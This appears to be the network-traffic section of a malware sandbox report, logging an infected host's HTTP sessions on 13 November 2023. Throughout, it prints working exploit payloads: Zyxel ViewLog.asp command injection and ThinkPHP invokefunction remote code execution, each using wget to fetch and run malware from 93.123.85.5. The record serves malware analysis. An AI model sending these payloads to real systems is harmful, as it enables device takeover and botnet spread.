                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              73192.168.2.233815862.244.11.1948080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:20.378920078 CET2582OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              73095.131.78.1928080192.168.2.2342602
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:55.887974024 CET14382INHTTP/1.1 403 Forbidden
                                                              Content-Type: text/html;charset=UTF-8
                                                              Content-Length: 0
                                                              Connection: close
                                                              Cache-control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              731192.168.2.2346314112.175.54.8780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:56.109219074 CET14386OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:56.416040897 CET14390INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:19:52 GMT
                                                              Server: Apache/2.2.15 (CentOS)
                                                              Content-Length: 301
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.2.15 (CentOS) Server at localhost Port 80</address></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              732192.168.2.235330295.217.216.7980
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:56.739015102 CET14426OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:57.052772999 CET14502INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:19:56 GMT
                                                              Server: Apache/2.4.52 (Ubuntu)
                                                              Content-Length: 316
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 4d 43 49 2e 53 36 2e 48 4c 43 2e 43 43 58 32 33 2e 55 42 32 32 2e 30 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at MCI.S6.HLC.CCX23.UB22.04 Port 80</address></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              733192.168.2.235644895.68.110.11380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:56.744015932 CET14427OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:58.965701103 CET14752INHTTP/1.1 400 Bad Request
                                                              Connection: Keep-Alive


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              734192.168.2.234642295.240.84.16380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:56.771220922 CET14428OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              735192.168.2.2342220112.167.252.17580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:57.341361046 CET14509OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:57.633886099 CET14515INHTTP/1.1 404 Not Found
                                                              Date: Mon, 13 Nov 2023 21:19:52 GMT
                                                              Server: Apache/2.2.3 (CentOS)
                                                              Content-Length: 281
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 33 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><hr><address>Apache/2.2.3 (CentOS) Server at localhost Port 80</address></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              736192.168.2.2339946112.185.49.21780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:57.348464012 CET14510OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:57.659040928 CET14515INHTTP/1.0 301 Redirect
                                                              Nov 13, 2023 22:19:57.659576893 CET14516INData Raw: 44 61 74 65 3a 20 54 75 65 20 4e 6f 76 20 31 34 20 30 36 3a 31 39 3a 35 37 20 32 30 32 33 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74
                                                              Data Ascii: Date: Tue Nov 14 06:19:57 2023Pragma: no-cacheCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: (null)Location: http://127.0.0.1:8899/login.asp<html><head></head><body>This document has moved to a new <a href="http://


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              737192.168.2.2346444112.158.166.8980
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:57.355741978 CET14510OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              738192.168.2.2357000112.125.168.17180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:57.383953094 CET14511OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:57.695729971 CET14526INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:16:51 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              739192.168.2.2340370112.126.230.13880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:57.385329962 CET14512OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:57.698441029 CET14527INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:16:37 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              74192.168.2.235158094.120.25.1358080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:20.408257008 CET2584OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              740192.168.2.233843862.31.238.428080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:58.193008900 CET14628OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:58.525820017 CET14639INHTTP/1.1 404
                                                              Content-Type: text/html;charset=utf-8
                                                              Content-Language: en
                                                              Content-Length: 431
                                                              Date: Mon, 13 Nov 2023 21:19:58 GMT
                                                              Keep-Alive: timeout=5
                                                              Connection: keep-alive
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              741192.168.2.233745495.163.237.1678080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:58.197684050 CET14629OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              742192.168.2.234514685.191.194.1378080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:58.197839022 CET14630OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:58.543953896 CET14642INHTTP/1.1 403 Forbidden


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              743192.168.2.234760631.136.7.168080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:58.205162048 CET14631OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:59.205895901 CET14764OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:01.221606970 CET14999OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:05.449033976 CET15557OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:13.636015892 CET16554OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:29.761883974 CET18556OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
